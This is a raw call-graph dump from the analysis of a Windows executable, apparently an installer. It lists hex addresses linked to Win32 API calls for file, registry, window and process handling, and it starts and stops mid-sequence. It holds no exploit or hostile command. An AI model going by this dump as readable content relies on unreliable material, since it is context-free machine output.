3784->3787 3788 405eb8 GetTickCount GetTempFileNameW 3787->3788 3789 401a0b 3788->3789 3790 405eee 3788->3790 3790->3788 3790->3789 4639 4022fd 4640 40145c 18 API calls 4639->4640 4641 402304 GetFileVersionInfoSizeW 4640->4641 4642 4030e3 4641->4642 4643 40232b GlobalAlloc 4641->4643 4643->4642 4644 40233f GetFileVersionInfoW 4643->4644 4645 402350 VerQueryValueW 4644->4645 4646 402381 GlobalFree 4644->4646 4645->4646 4647 402369 4645->4647 4646->4642 4652 405f7d wsprintfW 4647->4652 4650 402375 4653 405f7d wsprintfW 4650->4653 4652->4650 4653->4646 4654 402afd 4655 40145c 18 API calls 4654->4655 4656 402b04 4655->4656 4661 405e7c GetFileAttributesW CreateFileW 4656->4661 4658 402b10 4659 4030e3 4658->4659 4662 405f7d wsprintfW 4658->4662 4661->4658 4662->4659 4663 4029ff 4664 401553 19 API calls 4663->4664 4665 402a09 4664->4665 4666 40145c 18 API calls 4665->4666 4667 402a12 4666->4667 4668 402a1f RegQueryValueExW 4667->4668 4672 401a13 4667->4672 4669 402a45 4668->4669 4670 402a3f 4668->4670 4671 4029e4 RegCloseKey 4669->4671 4669->4672 4670->4669 4674 405f7d wsprintfW 4670->4674 4671->4672 4674->4669 4675 401000 4676 401037 BeginPaint GetClientRect 4675->4676 4677 40100c DefWindowProcW 4675->4677 4679 4010fc 4676->4679 4680 401182 4677->4680 4681 401073 CreateBrushIndirect FillRect DeleteObject 4679->4681 4682 401105 4679->4682 4681->4679 4683 401170 EndPaint 4682->4683 4684 40110b CreateFontIndirectW 4682->4684 4683->4680 4684->4683 4685 40111b 6 API calls 4684->4685 4685->4683 4686 401f80 4687 401446 18 API calls 4686->4687 4688 401f88 4687->4688 4689 401446 18 API calls 4688->4689 4690 401f93 4689->4690 4691 401fa3 4690->4691 4692 40145c 18 API calls 4690->4692 4693 401fb3 4691->4693 4694 40145c 18 API calls 4691->4694 4692->4691 4695 402006 4693->4695 4696 401fbc 4693->4696 4694->4693 4697 40145c 18 API calls 4695->4697 4698 401446 18 API calls 4696->4698 4699 40200d 4697->4699 4700 401fc4 4698->4700 4702 40145c 18 API calls 4699->4702 4701 401446 18 API calls 4700->4701 4703 401fce 4701->4703 4704 402016 FindWindowExW 4702->4704 4705 401ff6 SendMessageW 4703->4705 4706 401fd8 SendMessageTimeoutW 4703->4706 4708 402036 4704->4708 4705->4708 4706->4708 4707 4030e3 4708->4707 4710 405f7d wsprintfW 4708->4710 4710->4707 4711 402880 4712 402884 4711->4712 4713 40145c 18 API calls 4712->4713 4714 4028a7 4713->4714 4715 40145c 18 API calls 4714->4715 4716 4028b1 4715->4716 4717 4028ba RegCreateKeyExW 4716->4717 4718 4028e8 4717->4718 4723 4029ef 4717->4723 4719 402934 4718->4719 4721 40145c 18 API calls 4718->4721 4720 402963 4719->4720 4722 401446 18 API calls 4719->4722 4724 4029ae RegSetValueExW 4720->4724 4727 40337f 33 API calls 4720->4727 4725 4028fc lstrlenW 4721->4725 4726 402947 4722->4726 4730 4029c6 RegCloseKey 4724->4730 4731 4029cb 4724->4731 4728 402918 4725->4728 4729 40292a 4725->4729 4733 4062cf 11 API calls 4726->4733 4734 40297b 4727->4734 4735 4062cf 11 API calls 4728->4735 4736 4062cf 11 API calls 4729->4736 4730->4723 4732 4062cf 11 API calls 4731->4732 4732->4730 4733->4720 4742 406250 4734->4742 4739 402922 4735->4739 4736->4719 4739->4724 4741 4062cf 11 API calls 4741->4739 4743 406273 4742->4743 4744 4062b6 4743->4744 4745 406288 wsprintfW 4743->4745 4746 402991 4744->4746 4747 4062bf lstrcatW 4744->4747 4745->4744 4745->4745 4746->4741 4747->4746 4748 403d02 4749 403d0d 4748->4749 4750 403d11 4749->4750 4751 403d14 GlobalAlloc 4749->4751 4751->4750 4752 402082 4753 401446 18 API calls 4752->4753 4754 402093 SetWindowLongW 4753->4754 4755 4030e3 4754->4755 4756 402a84 4757 401553 19 API calls 4756->4757 4758 402a8e 4757->4758 4759 401446 18 API calls 4758->4759 4760 402a98 4759->4760 4761 401a13 4760->4761 4762 402ab2 RegEnumKeyW 4760->4762 4763 402abe RegEnumValueW 4760->4763 4764 402a7e 4762->4764 4763->4761 4763->4764 4764->4761 4765 4029e4 RegCloseKey 4764->4765 4765->4761 4766 402c8a 4767 402ca2 4766->4767 4768 402c8f 4766->4768 4770 40145c 18 API calls 4767->4770 4769 401446 18 API calls 4768->4769 4772 402c97 4769->4772 4771 402ca9 lstrlenW 4770->4771 4771->4772 4773 401a13 4772->4773 4774 402ccb WriteFile 4772->4774 4774->4773 4775 401d8e 4776 40145c 18 API calls 4775->4776 4777 401d95 ExpandEnvironmentStringsW 4776->4777 4778 401da8 4777->4778 4779 401db9 4777->4779 4778->4779 4780 401dad lstrcmpW 4778->4780 4780->4779 4781 401e0f 4782 401446 18 API calls 4781->4782 4783 401e17 4782->4783 4784 401446 18 API calls 4783->4784 4785 401e21 4784->4785 4786 4030e3 4785->4786 4788 405f7d wsprintfW 4785->4788 4788->4786 4789 40438f 4790 4043c8 4789->4790 4791 40439f 4789->4791 4792 403df6 8 API calls 4790->4792 4793 403d6b 19 API calls 4791->4793 4795 4043d4 4792->4795 4794 4043ac SetDlgItemTextW 4793->4794 4794->4790 4796 403f90 4797 403fa0 4796->4797 4798 403fbc 4796->4798 4807 405cb0 GetDlgItemTextW 4797->4807 4800 403fc2 SHGetPathFromIDListW 4798->4800 4801 403fef 4798->4801 4803 403fd2 4800->4803 4806 403fd9 SendMessageW 4800->4806 4802 403fad SendMessageW 4802->4798 4804 40141d 80 API calls 4803->4804 4804->4806 4806->4801 4807->4802 4808 402392 4809 40145c 18 API calls 4808->4809 4810 402399 4809->4810 4813 407224 4810->4813 4814 406efe 25 API calls 4813->4814 4815 407244 4814->4815 4816 4023a7 4815->4816 4817 40724e lstrcpynW lstrcmpW 4815->4817 4818 407280 4817->4818 4819 407286 lstrcpynW 4817->4819 4818->4819 4819->4816 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4820 402797 4821 40145c 18 API calls 4820->4821 4822 4027ae 4821->4822 4823 40145c 18 API calls 4822->4823 4824 4027b7 4823->4824 4825 40145c 18 API calls 4824->4825 4826 4027c0 GetPrivateProfileStringW lstrcmpW 4825->4826 4827 401e9a 4828 40145c 18 API calls 4827->4828 4829 401ea1 4828->4829 4830 401446 18 API calls 4829->4830 4831 401eab wsprintfW 4830->4831 3791 401a1f 3792 40145c 18 API calls 3791->3792 3793 401a26 3792->3793 3794 4062cf 11 API calls 3793->3794 3795 401a49 3794->3795 3796 401a64 3795->3796 3797 401a5c 3795->3797 3866 406035 lstrcpynW 3796->3866 3865 406035 lstrcpynW 3797->3865 3800 401a6f 3867 40674e lstrlenW CharPrevW 3800->3867 3801 401a62 3804 406064 5 API calls 3801->3804 3835 401a81 3804->3835 3805 406301 2 API calls 3805->3835 3808 401a98 CompareFileTime 3808->3835 3809 401ba9 3810 404f9e 25 API calls 3809->3810 3812 401bb3 3810->3812 3811 401b5d 3813 404f9e 25 API calls 3811->3813 3844 40337f 3812->3844 3815 401b70 3813->3815 3819 4062cf 11 API calls 3815->3819 3817 406035 lstrcpynW 3817->3835 3818 4062cf 11 API calls 3820 401bda 3818->3820 3824 401b8b 3819->3824 3821 401be9 SetFileTime 3820->3821 3822 401bf8 CloseHandle 3820->3822 3821->3822 3822->3824 3825 401c09 3822->3825 3823 406831 18 API calls 3823->3835 3826 401c21 3825->3826 3827 401c0e 3825->3827 3828 406831 18 API calls 3826->3828 3829 406831 18 API calls 3827->3829 3830 401c29 3828->3830 3832 401c16 lstrcatW 3829->3832 3833 4062cf 11 API calls 3830->3833 3832->3830 3836 401c34 3833->3836 3834 401b50 3838 401b93 3834->3838 3839 401b53 3834->3839 3835->3805 3835->3808 3835->3809 3835->3811 3835->3817 3835->3823 3835->3834 3837 4062cf 11 API calls 3835->3837 3843 405e7c GetFileAttributesW CreateFileW 3835->3843 3870 405e5c GetFileAttributesW 3835->3870 3873 405ccc 3835->3873 3840 405ccc MessageBoxIndirectW 3836->3840 3837->3835 3841 4062cf 11 API calls 3838->3841 3842 4062cf 11 API calls 3839->3842 3840->3824 3841->3824 3842->3811 3843->3835 3845 40339a 3844->3845 3846 4033c7 3845->3846 3879 403368 SetFilePointer 3845->3879 3877 403336 ReadFile 3846->3877 3850 401bc6 3850->3818 3851 403546 3853 40354a 3851->3853 3854 40356e 3851->3854 3852 4033eb GetTickCount 3852->3850 3857 403438 3852->3857 3855 403336 ReadFile 3853->3855 3854->3850 3858 403336 ReadFile 3854->3858 3859 40358d WriteFile 3854->3859 3855->3850 3856 403336 ReadFile 3856->3857 3857->3850 3857->3856 3861 40348a GetTickCount 3857->3861 3862 4034af MulDiv wsprintfW 3857->3862 3864 4034f3 WriteFile 3857->3864 3858->3854 3859->3850 3860 4035a1 3859->3860 3860->3850 3860->3854 3861->3857 3863 404f9e 25 API calls 3862->3863 3863->3857 3864->3850 3864->3857 3865->3801 3866->3800 3868 401a75 lstrcatW 3867->3868 3869 40676b lstrcatW 3867->3869 3868->3801 3869->3868 3871 405e79 3870->3871 3872 405e6b SetFileAttributesW 3870->3872 3871->3835 3872->3871 3874 405ce1 3873->3874 3875 405d2f 3874->3875 3876 405cf7 MessageBoxIndirectW 3874->3876 3875->3835 3876->3875 3878 403357 3877->3878 3878->3850 3878->3851 3878->3852 3879->3846 4832 40209f GetDlgItem GetClientRect 4833 40145c 18 API calls 4832->4833 4834 4020cf LoadImageW SendMessageW 4833->4834 4835 4030e3 4834->4835 4836 4020ed DeleteObject 4834->4836 4836->4835 4837 402b9f 4838 401446 18 API calls 4837->4838 4842 402ba7 4838->4842 4839 402c4a 4840 402bdf ReadFile 4840->4842 4849 402c3d 4840->4849 4841 401446 18 API calls 4841->4849 4842->4839 4842->4840 4843 402c06 MultiByteToWideChar 4842->4843 4844 402c3f 4842->4844 4845 402c4f 4842->4845 4842->4849 4843->4842 4843->4845 4850 405f7d wsprintfW 4844->4850 4847 402c6b SetFilePointer 4845->4847 4845->4849 4847->4849 4848 402d17 ReadFile 4848->4849 4849->4839 4849->4841 4849->4848 4850->4839 4851 402b23 GlobalAlloc 4852 402b39 4851->4852 4853 402b4b 4851->4853 4854 401446 18 API calls 4852->4854 4855 40145c 18 API calls 4853->4855 4857 402b41 4854->4857 4856 402b52 WideCharToMultiByte lstrlenA 4855->4856 4856->4857 4858 402b84 WriteFile 4857->4858 4859 402b93 4857->4859 4858->4859 4860 402384 GlobalFree 4858->4860 4860->4859 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 4927->4928 4929 4030e3 4927->4929 4928->4929 3880 4038af #17 SetErrorMode OleInitialize 3881 406328 3 API calls 3880->3881 3882 4038f2 SHGetFileInfoW 3881->3882 3954 406035 lstrcpynW 3882->3954 3884 40391d GetCommandLineW 3955 406035 lstrcpynW 3884->3955 3886 40392f GetModuleHandleW 3887 403947 3886->3887 3888 405d32 CharNextW 3887->3888 3889 403956 CharNextW 3888->3889 3900 403968 3889->3900 3890 403a02 3891 403a21 GetTempPathW 3890->3891 3956 4037f8 3891->3956 3893 403a37 3895 403a3b GetWindowsDirectoryW lstrcatW 3893->3895 3896 403a5f DeleteFileW 3893->3896 3894 405d32 CharNextW 3894->3900 3898 4037f8 11 API calls 3895->3898 3964 4035b3 GetTickCount GetModuleFileNameW 3896->3964 3901 403a57 3898->3901 3899 403a73 3902 403af8 3899->3902 3904 405d32 CharNextW 3899->3904 3940 403add 3899->3940 3900->3890 3900->3894 3907 403a04 3900->3907 3901->3896 3901->3902 4049 403885 3902->4049 3908 403a8a 3904->3908 4056 406035 lstrcpynW 3907->4056 3919 403b23 lstrcatW lstrcmpiW 3908->3919 3920 403ab5 3908->3920 3909 403aed 3912 406113 9 API calls 3909->3912 3910 403bfa 3913 403c7d 3910->3913 3915 406328 3 API calls 3910->3915 3911 403b0d 3914 405ccc MessageBoxIndirectW 3911->3914 3912->3902 3916 403b1b ExitProcess 3914->3916 3918 403c09 3915->3918 3922 406328 3 API calls 3918->3922 3919->3902 3921 403b3f CreateDirectoryW SetCurrentDirectoryW 3919->3921 4057 4067aa 3920->4057 3924 403b62 3921->3924 3925 403b57 3921->3925 3926 403c12 3922->3926 4074 406035 lstrcpynW 3924->4074 4073 406035 lstrcpynW 3925->4073 3930 406328 3 API calls 3926->3930 3933 403c1b 3930->3933 3932 403b70 4075 406035 lstrcpynW 3932->4075 3934 403c69 ExitWindowsEx 3933->3934 3939 403c29 GetCurrentProcess 3933->3939 3934->3913 3938 403c76 3934->3938 3935 403ad2 4072 406035 lstrcpynW 3935->4072 3941 40141d 80 API calls 3938->3941 3943 403c39 3939->3943 3992 405958 3940->3992 3941->3913 3942 406831 18 API calls 3944 403b98 DeleteFileW 3942->3944 3943->3934 3945 403ba5 CopyFileW 3944->3945 3951 403b7f 3944->3951 3945->3951 3946 403bee 3947 406c94 42 API calls 3946->3947 3949 403bf5 3947->3949 3948 406c94 42 API calls 3948->3951 3949->3902 3950 406831 18 API calls 3950->3951 3951->3942 3951->3946 3951->3948 3951->3950 3953 403bd9 CloseHandle 3951->3953 4076 405c6b CreateProcessW 3951->4076 3953->3951 3954->3884 3955->3886 3957 406064 5 API calls 3956->3957 3958 403804 3957->3958 3959 40380e 3958->3959 3960 40674e 3 API calls 3958->3960 3959->3893 3961 403816 CreateDirectoryW 3960->3961 3962 405eab 2 API calls 3961->3962 3963 40382a 3962->3963 3963->3893 4079 405e7c GetFileAttributesW CreateFileW 3964->4079 3966 4035f3 3986 403603 3966->3986 4080 406035 lstrcpynW 3966->4080 3968 403619 4081 40677d lstrlenW 3968->4081 3972 40362a GetFileSize 3973 403726 3972->3973 3987 403641 3972->3987 4086 4032d2 3973->4086 3975 40372f 3977 40376b GlobalAlloc 3975->3977 3975->3986 4098 403368 SetFilePointer 3975->4098 3976 403336 ReadFile 3976->3987 4097 403368 SetFilePointer 3977->4097 3980 4037e9 3983 4032d2 6 API calls 3980->3983 3981 403786 3984 40337f 33 API calls 3981->3984 3982 40374c 3985 403336 ReadFile 3982->3985 3983->3986 3990 403792 3984->3990 3989 403757 3985->3989 3986->3899 3987->3973 3987->3976 3987->3980 3987->3986 3988 4032d2 6 API calls 3987->3988 3988->3987 3989->3977 3989->3986 3990->3986 3990->3990 3991 4037c0 SetFilePointer 3990->3991 3991->3986 3993 406328 3 API calls 3992->3993 3994 40596c 3993->3994 3995 405972 3994->3995 3996 405984 3994->3996 4112 405f7d wsprintfW 3995->4112 3997 405eff 3 API calls 3996->3997 3998 4059b5 3997->3998 4000 4059d4 lstrcatW 3998->4000 4002 405eff 3 API calls 3998->4002 4001 405982 4000->4001 4103 403ec1 4001->4103 4002->4000 4005 4067aa 18 API calls 4006 405a06 4005->4006 4007 405a9c 4006->4007 